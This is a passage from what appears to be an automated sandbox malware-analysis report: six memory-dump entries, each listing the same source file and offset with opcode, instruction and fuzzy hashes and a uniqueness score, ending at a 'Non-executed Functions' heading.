                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54014b2da4aa2396e68e22a7aa96c0d8d8b39ff8db5fceac29e5cd43169486df
                                                • Instruction ID: 46d03948d2b29695b9d47396b98f48c9088c31c00cac7b0d76c2aa86fce79452
                                                • Opcode Fuzzy Hash: 54014b2da4aa2396e68e22a7aa96c0d8d8b39ff8db5fceac29e5cd43169486df
                                                • Instruction Fuzzy Hash: 03E09A30D0426ACFEBA4DFA5D880B9CB7B6AF44244F11959AD01DB6264DB345D85CF24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1158e469a6a62a843002a78b1dc2d25694e8a0f40d7c2521a3e0e82bab94c8c
                                                • Instruction ID: 7159465376d487f3316e38f603c05f710e6b19624a37ec0f8b372f8e0a48186b
                                                • Opcode Fuzzy Hash: c1158e469a6a62a843002a78b1dc2d25694e8a0f40d7c2521a3e0e82bab94c8c
                                                • Instruction Fuzzy Hash: DDE01732145249EFCB029F68C4408D57FB2AF4A310B0281C2E888AB672C230B867DB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37ab98473e821ebbda9465560f4f73785fdecc1e44ebec2a839c4331ed07b910
                                                • Instruction ID: 2b960dc35f9d34929a41fbf264e1fa154db24ea85c1b71536f20cb2c622b6a7b
                                                • Opcode Fuzzy Hash: 37ab98473e821ebbda9465560f4f73785fdecc1e44ebec2a839c4331ed07b910
                                                • Instruction Fuzzy Hash: 82D0123141AB804ED783733449110DD7FB0EF23104B855797D0C69B663E910669AD3A3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0c511b12b8ab756c1dc7efb10c21b5dca2b8e835fc0b441a72db8c40ff7947d
                                                • Instruction ID: ea17a7903bbb09a164c6e3f5cfe9d498457ab4ae31a5b9377b46e4b84bba47ca
                                                • Opcode Fuzzy Hash: a0c511b12b8ab756c1dc7efb10c21b5dca2b8e835fc0b441a72db8c40ff7947d
                                                • Instruction Fuzzy Hash: C8D01270D051689FDBE0EB55C840B8DB7B2FB45310F14D295C02DA7214D6348D84CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1932bc5734d142ac1cad30b92a896c7707486251eabf6959d59d6bb9e0db1ccc
                                                • Instruction ID: ba67bd43f7278cd565a4b3237200f1e43fe9a6a0b140b574b6f3cf3010cc2f8c
                                                • Opcode Fuzzy Hash: 1932bc5734d142ac1cad30b92a896c7707486251eabf6959d59d6bb9e0db1ccc
                                                • Instruction Fuzzy Hash: 6AC0023605424DBBCF025EC1EC05EDA7F2AEB08761F008411FB19141A187B39570ABA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2607fc39f1cd5f28a2c10af32de676bd92e73820400a404775b4131022be8eec
                                                • Instruction ID: 115590ed50afb758944c7c5456113d01006686c5a70aa352a3f6d96dece16535
                                                • Opcode Fuzzy Hash: 2607fc39f1cd5f28a2c10af32de676bd92e73820400a404775b4131022be8eec
                                                • Instruction Fuzzy Hash: F5C00235140108AFC700DF55D445D957BA9EB59661B1180A1F9484B732C632E951DA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions